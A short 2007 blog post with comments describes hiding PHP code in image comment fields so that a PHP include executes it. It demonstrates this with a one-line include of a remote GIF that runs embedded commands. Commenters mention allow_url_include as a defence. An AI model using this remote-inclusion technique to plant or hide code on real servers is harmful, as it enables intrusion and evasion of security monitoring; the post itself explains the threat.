As reported by the ISC, some people are using images to hide PHP code : if an image, contains PHP code, for example in the comment section, it may be included as an usual PHP file, and the PHP code will be happily executed. It may be a great way to hide malicious code in hacked servers and to bypass some IDS/WAF…

Here’s a demo: create a PHP file that would include this innocent image :

<?php
include("http://mdessus.free.fr/Divers/imgwithphpcmd.gif");
?>

go to the previously created file’s URL, and voila :

PHP commands embedded from an image

June 19, 2007, 4:19 pm lock

Add your own comment or set a trackback

Currently 4 comments

  1. Comment by Mathieu Dessus

    Have a look to allow_url_include directive: if poeple are not allowed to upload file on the server this will prevent remote file inclusion.

  2. Comment by Andrei

    How can developers get rid of this scripts inside of uploaded images?

  3. Comment by Mathieu Dessus

    Just open an image with your favorite image editor, and find where you can add a comment. In Gimp, select Image > Image properties

  4. Comment by AccesInterzis

    Can you show how it can be added PHP code into an image?

Add your own comment

*
To prove you're a person (not a spam script), type the security word shown in the picture.
Anti-Spam Image



Follow comments according to this article through a RSS 2.0 feed